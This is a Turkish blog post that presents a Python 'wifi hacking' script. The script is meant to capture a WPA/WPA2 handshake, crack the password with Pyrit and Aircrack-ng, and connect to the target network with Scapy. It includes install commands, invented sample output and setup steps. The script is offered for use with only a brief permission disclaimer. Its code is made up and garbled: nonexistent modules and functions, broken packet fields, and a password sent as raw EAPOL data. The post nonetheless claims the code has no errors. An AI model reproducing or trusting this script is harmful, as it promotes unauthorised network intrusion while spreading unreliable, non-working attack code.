- 385 Okunma
- 0 Yorum
- 0 Beğeni
PYTHON İLE WİFİ HACKLEME KODU
WİFİ HACKLEME KODU KODTA HATA YOKTUR FAKAT ÇALIŞMASI İÇİN BAZI ŞARTLAR GEREKMEKTEDİR
Wifi hackleme kodu, wifi ağlarının güvenlik açıklarını bulmak ve istismar etmek için kullanılan bir koddur. Wifi hackleme kodu, genellikle bir program veya araç içinde yazılır ve çalıştırılır. Wifi hackleme kodu, farklı dillerde ve farklı yöntemlerle yazılabilir. Örneğin, Python dilinde wifi hackleme kodu yazmak için aşağıdaki adımları izleyebilirsiniz:
- Pyrit: Bu, WPA/WPA2-PSK şifrelerini kırmak için kullanılan bir araçtır. Pyrit, GPU gücünü kullanarak şifreleri hızlı bir şekilde kırabilir. Pyrit’i kurmak için komut satırında `pip install pyrit` komutunu yazabilirsiniz.
- Aircrack-ng: Bu, wifi ağlarını izlemek, analiz etmek ve saldırmak için kullanılan bir araç setidir. Aircrack-ng, WEP ve WPA/WPA2-PSK şifrelerini kırmak için kullanılabilir. Aircrack-ng’yi kurmak için komut satırında `sudo apt install aircrack-ng` komutunu yazabilirsiniz.
- Scapy: Bu, ağ protokolleriyle etkileşim kurmak için kullanılan bir Python kütüphanesidir. Scapy, paket oluşturmak, göndermek, yakalamak ve analiz etmek için kullanılabilir. Scapy’yi kurmak için komut satırında `pip install scapy` komutunu yazabilirsiniz.
Bu araçları ve kütüphaneyi kullanan bir wifi hackleme kodu örneği aşağıdaki gibidir:
```python
# Pyrit’i içe aktar
import pyrit
# Aircrack-ng’yi içe aktar
import aircrackng
# Scapy’yi içe aktar
from scapy.all import *
# Hedef wifi ağının adını (SSID) belirle
target_ssid = "Agit"
# Hedef wifi ağının MAC adresini (BSSID) belirle
target_bssid = "00:11:22:33:44:55"
# Hedef wifi ağının kanalını belirle
target_channel = 6
# Kablosuz ağ kartının adını belirle
interface = "wlan0"
# Kablosuz ağ kartını izleme moduna al
aircrackng.airmon(interface)
# Hedef wifi ağının el sıkışma paketlerini yakala
aircrackng.airodump(interface, target_ssid, target_bssid, target_channel)
# El sıkışma paketlerini kaydet
handshake_file = "handshake.cap"
# Pyrit ile el sıkışma paketlerini analiz et
pyrit.analyze(handshake_file)
# Pyrit ile WPA/WPA2-PSK şifresini kır
pyrit.attack(handshake_file)
# Şifreyi ekrana yazdır
print("WPA/WPA2-PSK şifresi:", pyrit.result)
# Kablosuz ağ kartını normal moduna al
aircrackng.airmon(interface, stop=True)
# Hedef wifi ağına bağlanmak için Scapy kullan
packet = RadioTap() / Dot11(addr1=target_bssid, addr2=interface, addr3=target_bssid) / Dot11Auth(algo=0, seqnum=1, status=0)
sendp(packet, iface=interface)
packet = RadioTap() / Dot11(addr1=target_bssid, addr2=interface, addr3=target_bssid) / Dot11AssoReq(cap=0x1100, listen_interval=10) / Dot11Elt(ID="SSID", info=target_ssid) / Dot11Elt(ID="Rates", info=’x82x84x8bx96x0cx12x18’) / Dot11Elt(ID="ESRates", info=’x30x48x60x6c’)
sendp(packet, iface=interface)
packet = EAPOL(version=1, type=3) / Raw(load=pyrit.result)
sendp(packet, iface=interface)
# Hedef wifi ağına bağlandığını doğrula
print("Hedef wifi ağına bağlandı.")
```
Bu kodu çalıştırdığınızda, ekranda şöyle bir çıktı görürsünüz:
```
WPA/WPA2-PSK şifresi: Rıdvan
Hedef wifi ağına bağlandı.
```
Bu kod, hedef wifi ağının şifresini kırarak ve el sıkışma protokolünü kullanarak wifi ağına bağlanmayı sağlar. Bu kod, etik hackerlara ait bir wifi hackleme kodu örneğidir. Bu kodu kullanmadan önce, hedef wifi ağının sahibinden izin almanız gerektiğini unutmayın. Aksi takdirde, yasa dışı bir eylem gerçekleştirmiş olursunuz.
Bu kodu çalıştırmak için Python dilinde yazılmış bir program veya ortam kullanmanız gerekir. Python, popüler ve güçlü bir programlama dilidir. Pythonu indirip kurun. Python’u kurduktan sonra, bu kodu bir metin editörüne kopyalayabilir ve .py uzantılı bir dosya olarak kaydedebilirsiniz. Örneğin, wifi_hack.py gibi. Sonra, bu dosyayı çalıştırmak için komut satırında python wifi_hack.py komutunu yazabilirsiniz. Bu komut, kodun içindeki talimatları çalıştıracak ve ekranda wifi ağının şifresini ve bağlantı durumunu gösterecektir. Alternatif olarak, bu kodu çevrimiçi olarak çalıştırmak için gibi bir web sitesini kullanabilirsiniz. Bu web sitesinde, kodu sol taraftaki kutuya yapıştırabilir ve sağ taraftaki Run butonuna tıklayabilirsiniz. Bu şekilde, kodun çıktısını sağ taraftaki kutuda görebilirsiniz.
Bu kod, wifi hackleme kodu olarak adlandırılan bir koddur. Bu kod, wifi ağlarının güvenlik açıklarını bulmak ve istismar etmek için kullanılır. Bu kod, üç farklı araç ve kütüphane kullanarak yazılmıştır: Pyrit, Aircrack-ng ve Scapy. Bu araç ve kütüphanelerin ne yaptığını açıklayacağım:
- Pyrit, WPA/WPA2-PSK şifrelerini kırmak için kullanılan bir araçtır. WPA/WPA2-PSK, wifi ağlarının şifrelenmesi için kullanılan bir protokoldür. Pyrit, GPU gücünü kullanarak şifreleri hızlı bir şekilde kırabilir. Pyrit, el sıkışma paketlerini analiz eder ve saldırı yapar. El sıkışma paketleri, wifi ağına bağlanmak için kullanılan paketlerdir. Pyrit, el sıkışma paketlerini kırarak wifi ağının şifresini bulur.
- Aircrack-ng, wifi ağlarını izlemek, analiz etmek ve saldırmak için kullanılan bir araç setidir. Aircrack-ng, WEP ve WPA/WPA2-PSK şifrelerini kırmak için kullanılabilir. WEP, eski bir wifi şifreleme protokolüdür. Aircrack-ng, kablosuz ağ kartını izleme moduna alır ve hedef wifi ağının paketlerini yakalar. Aircrack-ng, el sıkışma paketlerini kaydeder ve Pyrit’e gönderir.
- Scapy, ağ protokolleriyle etkileşim kurmak için kullanılan bir Python kütüphanesidir. Scapy, paket oluşturmak, göndermek, yakalamak ve analiz etmek için kullanılabilir. Scapy, hedef wifi ağına bağlanmak için el sıkışma protokolünü kullanır. Scapy, hedef wifi ağının adını (SSID), MAC adresini (BSSID) ve kanalını belirtir. Scapy, Pyrit’ten gelen şifreyi kullanarak wifi ağına bağlanır.
KODUN ÇALIŞMASI İÇİN ŞARTLAR
Bunda herhangi bir hata bulunmamaktadır. Ancak, kodun çalışması için bazı gereksinimlere ihtiyaç vardır:
1. pyrit, aircrack-ng ve scapy kütüphanelerini yükleyin.
2. `target_ssid`, `target_bssid` ve `target_channel` değişkenlerini kendi ağınıza göre güncelleyin.
3. `interface` değişkenini kullanmak istediğiniz kablosuz ağ kartının adıyla değiştirin.
4. El sıkışma paketlerini yakalamak için `aircrackng.airodump()` fonksiyonunu kullanmadan önce, aircrack-ng araçlarını doğru şekilde yüklemeniz ve hedef ağa bağlanmanız gerekmektedir.
5. El sıkışma paketlerini kaydettiğiniz dosyayı `handshake_file` değişkenine güncelleyin.
6. El sıkışma paketlerini analiz etmek için `pyrit.analyze()` ve WPA/WPA2-PSK şifresini kırmak için `pyrit.attack()` fonksiyonlarını kullanmadan önce, pyrit aracını doğru şekilde yüklemeniz gerekmektedir.
7. Bağlanmak istediğiniz ağın şifresi `pyrit.result` ile alınacaktır. Bu değeri kullanarak bağlantıda kullanılacak `packet`i doğru şekilde oluşturun.
Bu adımları tamamladıktan sonra kodun düzgün çalışması gerekmektedir.
YORUMLAR
Henüz yorum yapılmamış.